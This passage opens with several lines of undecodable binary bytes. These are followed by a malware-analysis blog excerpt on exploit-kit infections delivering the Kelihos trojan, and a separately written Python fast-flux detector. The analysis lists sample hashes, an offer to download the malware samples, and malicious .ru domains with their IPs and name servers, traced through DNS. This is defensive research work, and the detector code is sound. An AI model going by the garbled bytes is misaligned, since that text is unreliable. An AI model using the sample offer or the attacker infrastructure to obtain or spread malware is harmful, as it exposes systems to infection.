\x9e\x85ezc\x86ezs\x86ez\xa4\x8bez\x99\x8aez\xa9\x8bez\xa7\x91\xb4\xed\xa3RW#\"p\x87)P\xd4\x98\xb3\x99\x1a\x869\x1dGo\xf2B\xdc\x9e\x97\xdb\x07\x9e\x85ez\xf1\x85ez\x01\x86ez2\x8bez'\x8aez7\x8bez\xfa\x9f\xb1\xb0p:\xd2\xcax\xf7\xe2bO\xd1e\xf2\x84{\x05\xcf\x18B\xde\xa8\\\xad\xe6\xcf\x8bR\xae\xc9\x1c:J\xab\xe4\xf1\xeb\xf8\x98\\\xd4\xeb\rjE\xcfM\xae\xe6\xcd\xf6\xfbo\xc9\x1c\x9c\xec\xaa\xb8
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezQ\x86eza\x86ez\x92\x8bez\x87\x8aez\x97\x8bez\xeav>HN\xec\x8d\xe3I\x8f\xd3\x9br(\xba\x99\x86c\xd9\xb6kB\x9ab\xa3-\\\x1f\xe0\xb1\x88\xb8\xc3)\vg\xech^P+1\xe9\xdf\xa8\x1a(\xe3\xe5\xe2\xe2\x07\"K\xa8Jx
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezV\x86ezf\x86ez\x97\x8bez\x8c\x8aez\x9c\x8bez\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb2$S\xe9\xb8\x13\xc9\x94\xcb\xb46\x83\x85\xa9\x191.\\?B\xe9\x97X\xf5\xf0+\xe2Oq\x04b\xc8#!N:\xe5\x04\x89\xfe\x87\xc6\xa2[\x85\bU\xda\xeb\x8a_\x80\xf3\x1a\xeb\x95\tn\xb8\xf0\xe1\xda\x9d\xcf\xca\x88Z\xd6\x92\xf3\x03\xef:R\x04\xc4e~\x9ct*=\x92\x93\x15\xc3U\x91\x1d\xe5:F\xaa\x0c\xe6$b\xd3+\xc8\xa7\xe7\x1e)\b\xfe\x0cC5\x852ca9#nz]\xdd\xe5\xf9\xaf\x1a)h\x98\xaa6\xa8\x12\xb9p\xbdfj\xbe\x89\xb8~\b\xc6\xb3\xc4\xe4\x86\xfd\xdcC\xc6&\xff\x9c\xc9\x96\x1e(E>j\x88\xdce$r\x93\x97\x98\xf2\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb\x8dEIu\xb8'htt\xa6\xb2\x97\xec\x91\xcf\xcd\x9e\x85
\x9e\x85ez\xee\x85ez\xfe\x85ez/\x8bez$\x8aez4\x8bez\x07C\x12\xa3d\xb1J\xcfh\xcaI8u=\xb0\x03\xe09ak\xa6R.\xc4\r\x12\xadWN\x82
\x9e\x85ez\xfc\x85ez\x0c\x86ez=\x8bez2\x8aezB\x8bez\x0eqd\xf3\rV\xb3\xed\xfa\x1a\xabN\r\xf1CH\x17rX\x1c\xea\xd5\xb2P\\\xb8\xf1\xfd\\\x9d\xa7\"i\x18\xba6\xb9q\xb9\x05\x80\xc6m\xafO\xb4\xfa\x98\xb9&)Rh\xb8\xff|\xf8\x82\x9a'\x0e\x01\xefAz\t\"{\xaf#\xa9D\t \x97\x94\xe2\x06\xeb\xf8]`=\xe6\x0c\xd81\x1f\xc2q
\x9e\x85ez/\x86ez?\x86ezp\x8beze\x8aezu\x8bez\xd9Ji$g\xa0\xdb\x80\x99\x99\x85U\xa1\xf4?\xddA\x1b\x1fcc)\xb0\x17\xab\x04\xbf\x94\xd0\xc6\x1e\xd0\x88\xb3J\v'5j\x95ON\x9fo/\xfd\xe5',\xc2
\x9e\x85ez\xfb\x85ez\v\x86ez<\x8bez1\x8aezA\x8bez\xf3\xba\xf3\xedGF\xbc]\xef(\xe8u4\x91\x1fWQ\x80\x0c`\xdf0\xbe\xb9\xf0\xa4\x05E\xf6%\xc6\x10U\xff\x0e0\x17\x14\xdfuO\xd3\x0e\x91\xc2\x1d+\x1d\xd9\xa2\xcfma\xe3{\x1a\x9aZ/c5\xffD\xdf\x07G`\xe7n\xd9w\xd9\xf5%\xfdB\x19O\x80:\x81\xd5\xbb\xa8x.\x03Y!\x11gU\xb5\xf3\xba\xf3\xedGF\xbc]\xef(\xe8u4\x91\x1fWp\xf5M\x98S\x15\xd7\xf3?q\xc1u\x9f\xbc\xda|\xeb\xd5%\x9aJ\x8b\xbb7\x1c\xc4cQ\x87\xe8Ua\xadh1\xd8\x90\x11>\x89\xc1\"$\xe5K\xb65X^\xe3\x82\xef\xadd\x13\b-\x99\x84\\n\x19\xe4\xbbD>u
// EXECUTED THREAD PROCESSES..
0x2b0 lsass.exe
0x3f4 svchost.exe
// LOADING MODULE...
C:\WINDOWS\system32\wbem\wbemcons.dll by PID:0x3f4 (svchost.exe)
Virus Total Report
RedKit EK landing page - hcwf.htm 942641ec71e352d531805ed1082d6056 (0/44)
BHEK landing page - 1.php a66429f2424a3824a9eb054a9084cf5b (3/46)
RedKit Downloaded Troj1 - setup.exe dc042fd30376f2f056ab3851be6190c7 (15/43)
BHEK Downloaded Troj2 - calc.exe 42a4de1001682f27ad55c893af9bd23d (12/46) (fetched by the PDF shellcode from wufjajcy.ru)
BHEK PDF Trojan Downloader - sample3.pdf d68baa5a947cd84c993f6c5b972f6708 (22/46)
Final Trojan Khelios - newbos2.exe 476f829bc53228c303331aa1f783f7f0 (12/46)
URL Query Report
Samples
:-) Here's the download URL (for research purposes only!) -->>[MEDIAFIRE]
Infector Domain Analysis
The Khelios Domain & Historical IP Information (you can get more infector domains by pivoting on these IPs; the DNS servers used for the Khelios payload .RU domains are listed after the A records):
cucaklif.ru A 5.79.227.65
cucaklif.ru A 77.106.119.105
cucaklif.ru A 88.206.64.69
cucaklif.ru A 89.221.113.36
cucaklif.ru A 95.104.102.82
cucaklif.ru A 159.148.124.172
cucaklif.ru A 177.199.108.51
cucaklif.ru A 178.137.235.238
cucaklif.ru A 188.19.160.215
cucaklif.ru A 202.122.63.80
cucaklif.ru A 203.80.126.186
worgukiw.ru A 14.97.222.104
worgukiw.ru A 24.14.110.124
worgukiw.ru A 27.188.153.72
worgukiw.ru A 37.229.235.32
worgukiw.ru A 46.109.154.27
worgukiw.ru A 46.161.190.98
worgukiw.ru A 62.61.52.166
worgukiw.ru A 68.56.17.213
worgukiw.ru A 72.177.166.48
worgukiw.ru A 87.110.18.105
worgukiw.ru A 89.230.155.107
worgukiw.ru A 90.46.70.228
worgukiw.ru A 93.105.108.84
worgukiw.ru A 109.126.30.178
worgukiw.ru A 111.255.78.122
worgukiw.ru A 112.105.92.46
worgukiw.ru A 114.39.91.89
worgukiw.ru A 119.70.17.64
worgukiw.ru A 159.148.43.126
worgukiw.ru A 178.44.196.20
worgukiw.ru A 178.218.65.83
worgukiw.ru A 201.213.124.107
oqivynle.ru A 1.169.174.98
oqivynle.ru A 27.3.193.56
oqivynle.ru A 37.19.146.142
oqivynle.ru A 58.99.12.25
oqivynle.ru A 66.176.136.81
oqivynle.ru A 77.45.11.232
oqivynle.ru A 88.222.224.163
oqivynle.ru A 93.105.37.117
oqivynle.ru A 96.49.157.112
oqivynle.ru A 111.249.158.111
oqivynle.ru A 151.32.120.175
oqivynle.ru A 182.156.158.115
oqivynle.ru A 187.186.74.50
oqivynle.ru A 188.129.225.16
The name servers (NS records) of the Khelios payload .RU domains:
ns1.newrect.com
ns2.newrect.com
ns3.newrect.com
ns4.newrect.com
ns5.newrect.com
ns6.newrect.com
↑The operator of these name servers should be made a subject of investigation. So let's analyze how these infector domains are distributed by their evil DNS to their IP addresses. I am using two random DNS servers as a starting base for tracking the current NS records. Watch the addresses in the trace: every ns*.newrect.com host answers from a different IP at every referral (ns1.newrect.com alone shows up on five different addresses for cucaklif.ru), so the name servers themselves are fast-flux, not just the A records.
@unixfreaxjp /malware]$ date
Mon Dec 31 04:10:26 JST 2012
@unixfreaxjp /malware]$ mydnstrace cucaklif.ru worgukiw.ru oqivynle.ru
Tracing to cucaklif.ru[a] via 202.238.95.24, maximum of 3 retries
202.238.95.24 (202.238.95.24)
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns6.newrect.com [cucaklif.ru] (46.118.84.205) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (98.203.119.95) Got authoritative answer
| |\___ ns1.newrect.com [cucaklif.ru] (62.178.200.113) * * *
| |\___ ns4.newrect.com [cucaklif.ru] (84.232.243.160) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (14.98.225.76) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (1.169.82.215) Got authoritative answer
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns3.newrect.com [cucaklif.ru] (159.224.247.96) * Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (95.68.85.182) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (176.36.82.206) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (136.169.52.175) Got authoritative answer
| |\___ ns2.newrect.com [cucaklif.ru] (115.252.8.87) Got authoritative answer
| \___ ns1.newrect.com [cucaklif.ru] (87.110.84.205) Got authoritative answer
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns1.newrect.com [cucaklif.ru] (86.125.192.34) * * Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (79.115.4.61) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (60.196.154.12) Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (124.43.156.174) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (66.63.125.247) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (37.123.3.213) Got authoritative answer
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns2.newrect.com [cucaklif.ru] (46.98.30.104) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (218.37.77.170) Got authoritative answer
| |\___ ns1.newrect.com [cucaklif.ru] (114.26.132.112) * * *
| |\___ ns4.newrect.com [cucaklif.ru] (223.179.247.64) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (37.235.181.207) Got authoritative answer
| \___ ns3.newrect.com [cucaklif.ru] (111.119.184.27) * * *
\___ a.dns.ripn.net [ru] (193.232.128.6)
|\___ ns5.newrect.com [cucaklif.ru] (91.196.45.235) Got authoritative answer
|\___ ns3.newrect.com [cucaklif.ru] (195.254.182.197) Got authoritative answer
|\___ ns1.newrect.com [cucaklif.ru] (93.78.154.181) Got authoritative answer
|\___ ns4.newrect.com [cucaklif.ru] (50.150.25.163) Got authoritative answer
|\___ ns2.newrect.com [cucaklif.ru] (213.200.53.16) * * *
\___ ns6.newrect.com [cucaklif.ru] (89.41.42.216) Got authoritative answer
Tracing to worgukiw.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns3.newrect.com [worgukiw.ru] (188.190.5.185) Got authoritative answer
| |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) Got authoritative answer
| |\___ ns6.newrect.com [worgukiw.ru] (86.100.10.121) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (78.97.37.167) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (93.116.113.161) Got authoritative answer
| \___ ns5.newrect.com [worgukiw.ru] (111.88.6.136) *
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns4.newrect.com [worgukiw.ru] (46.250.124.196) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (87.110.88.204) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (95.46.206.59) Got authoritative answer
| |\___ ns6.newrect.com [worgukiw.ru] (50.130.45.53) *
| |\___ ns5.newrect.com [worgukiw.ru] (94.244.177.63) Got authoritative answer
| \___ ns3.newrect.com [worgukiw.ru] (117.226.27.200) Got authoritative answer
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns1.newrect.com [worgukiw.ru] (111.67.75.93) *
| |\___ ns5.newrect.com [worgukiw.ru] (37.99.24.241) *
| |\___ ns3.newrect.com [worgukiw.ru] (49.205.243.189) *
| |\___ ns4.newrect.com [worgukiw.ru] (95.209.170.44) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (175.180.77.31) *
| \___ ns6.newrect.com [worgukiw.ru] (188.124.119.193) Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns5.newrect.com [worgukiw.ru] (109.94.108.114) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (176.240.146.178) Got authoritative answer
| |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) (cached)
| |\___ ns3.newrect.com [worgukiw.ru] (180.149.218.65) *
| |\___ ns2.newrect.com [worgukiw.ru] (91.196.45.235) Got authoritative answer
| \___ ns6.newrect.com [worgukiw.ru] (109.169.207.220) Got authoritative answer
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
\___ e.dns.ripn.net [ru] (193.232.142.17)
|\___ ns2.newrect.com [worgukiw.ru] (95.200.166.236) Got authoritative answer
|\___ ns6.newrect.com [worgukiw.ru] (195.254.182.197) Got authoritative answer
|\___ ns4.newrect.com [worgukiw.ru] (82.212.128.63) Got authoritative answer
|\___ ns3.newrect.com [worgukiw.ru] (218.173.22.77) *
|\___ ns1.newrect.com [worgukiw.ru] (178.148.145.215) *
\___ ns5.newrect.com [worgukiw.ru] (111.254.17.110) Got authoritative answer
Tracing to oqivynle.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns1.newrect.com [oqivynle.ru] (89.148.107.194) Got authoritative answer
| |\___ ns6.newrect.com [oqivynle.ru] (89.200.147.156) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (87.207.101.220) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (95.57.146.216) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (118.35.96.145) Got authoritative answer
| \___ ns3.newrect.com [oqivynle.ru] (89.228.55.91) Got authoritative answer
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns5.newrect.com [oqivynle.ru] (89.43.191.93) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (82.211.161.239) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (92.240.37.150) Got authoritative answer
| |\___ ns1.newrect.com [oqivynle.ru] (178.150.227.84) Got authoritative answer
| |\___ ns3.newrect.com [oqivynle.ru] (118.35.96.145) (cached)
| \___ ns6.newrect.com [oqivynle.ru] (84.205.30.45) Got authoritative answer
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns4.newrect.com [oqivynle.ru] (178.52.52.126) *
| |\___ ns3.newrect.com [oqivynle.ru] (60.196.154.12) Got authoritative answer
| |\___ ns6.newrect.com [oqivynle.ru] (31.11.86.91) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (178.210.153.47) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (89.191.165.117) Got authoritative answer
| \___ ns1.newrect.com [oqivynle.ru] (188.26.249.96) Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns6.newrect.com [oqivynle.ru] (212.160.231.215) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (86.106.92.7) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (5.105.62.233) Got authoritative answer
| |\___ ns3.newrect.com [oqivynle.ru] (46.109.99.63) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (91.190.57.250) Got authoritative answer
| \___ ns1.newrect.com [oqivynle.ru] (95.84.197.10) Got authoritative answer
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
\___ d.dns.ripn.net [ru] (194.190.124.17)
|\___ ns6.newrect.com [oqivynle.ru] (197.159.13.140) *
|\___ ns2.newrect.com [oqivynle.ru] (86.100.148.17) Got authoritative answer
|\___ ns1.newrect.com [oqivynle.ru] (46.172.100.70) Got authoritative answer
|\___ ns3.newrect.com [oqivynle.ru] (109.239.41.28) Got authoritative answer
|\___ ns5.newrect.com [oqivynle.ru] (46.109.125.151) *
\___ ns4.newrect.com [oqivynle.ru] (91.196.45.235) Got authoritative answer
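As an added example (my own Python, not the post's tooling), here is a check that turns the trace above into a detection: parse the referral lines, collect the distinct addresses each ns*.newrect.com host answered from, and flag name servers that show up on several addresses, which is the fast-flux pattern. The Kelihos lines are copied from the cucaklif.ru trace above; the control sample for a stable domain is constructed with hypothetical hosts and documentation addresses. Function names and the threshold are my own choices.

```python
import re
from collections import defaultdict

# Added example, not from the original post: flag fast-flux name servers in
# mydnstrace-style output by counting the distinct addresses each NS host
# resolved to. Function names are my own.
ENTRY_RE = re.compile(r"(\S+)\s+\[([\w.-]+)\]\s+\((\d{1,3}(?:\.\d{1,3}){3})\)")

# Lines copied from the cucaklif.ru trace above (first three .ru TLD servers).
KELIHOS_TRACE = r"""
202.238.95.24 (202.238.95.24)
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns6.newrect.com [cucaklif.ru] (46.118.84.205) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (98.203.119.95) Got authoritative answer
| |\___ ns1.newrect.com [cucaklif.ru] (62.178.200.113) * * *
| |\___ ns4.newrect.com [cucaklif.ru] (84.232.243.160) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (14.98.225.76) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (1.169.82.215) Got authoritative answer
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns3.newrect.com [cucaklif.ru] (159.224.247.96) * Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (95.68.85.182) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (176.36.82.206) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (136.169.52.175) Got authoritative answer
| |\___ ns2.newrect.com [cucaklif.ru] (115.252.8.87) Got authoritative answer
| \___ ns1.newrect.com [cucaklif.ru] (87.110.84.205) Got authoritative answer
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns1.newrect.com [cucaklif.ru] (86.125.192.34) * * Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (79.115.4.61) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (60.196.154.12) Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (124.43.156.174) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (66.63.125.247) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (37.123.3.213) Got authoritative answer
"""

# Constructed control sample (hypothetical hosts, RFC 5737 addresses): a domain
# whose name servers answer from the same address whichever TLD server referred us.
STABLE_TRACE = r"""
|\___ a.tld-server.example [example] (192.0.2.1)
| |\___ ns1.example.net [stable.example] (192.0.2.10) Got authoritative answer
| \___ ns2.example.net [stable.example] (192.0.2.11) Got authoritative answer
|\___ b.tld-server.example [example] (192.0.2.2)
| |\___ ns1.example.net [stable.example] (192.0.2.10) Got authoritative answer
| \___ ns2.example.net [stable.example] (192.0.2.11) Got authoritative answer
"""


def ns_addresses(trace: str) -> dict:
    """Map each name server host to the set of IPv4 addresses it resolved to.
    Referral lines for the TLD servers themselves ([ru]) are skipped."""
    seen = defaultdict(set)
    for line in trace.splitlines():
        m = ENTRY_RE.search(line)
        if not m:
            continue
        ns, zone, ip = m.groups()
        if "." not in zone:      # [ru], [example]: a TLD referral, not an NS of the domain
            continue
        seen[ns].add(ip)
    return dict(seen)


def fast_flux_nameservers(trace: str, min_distinct: int = 3) -> list:
    """Name servers that answered from at least `min_distinct` different IPs."""
    return sorted(ns for ns, ips in ns_addresses(trace).items()
                  if len(ips) >= min_distinct)


if __name__ == "__main__":
    for ns, ips in sorted(ns_addresses(KELIHOS_TRACE).items()):
        print(f"{ns}: {len(ips)} distinct addresses -> {sorted(ips)}")
    print("fast-flux:", fast_flux_nameservers(KELIHOS_TRACE))
    print("control:  ", fast_flux_nameservers(STABLE_TRACE))
```

With only three TLD referrals every newrect.com name server already answers from three different addresses, while the stable control never exceeds one; on the full trace above the count per name server is five or six. The threshold is a tuning knob: legitimate anycast or round-robin name servers can show two or three addresses, so in production compare against the domain's own history rather than a fixed number.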
#MalwareMustDie - Happy New Year to friends & crusaders!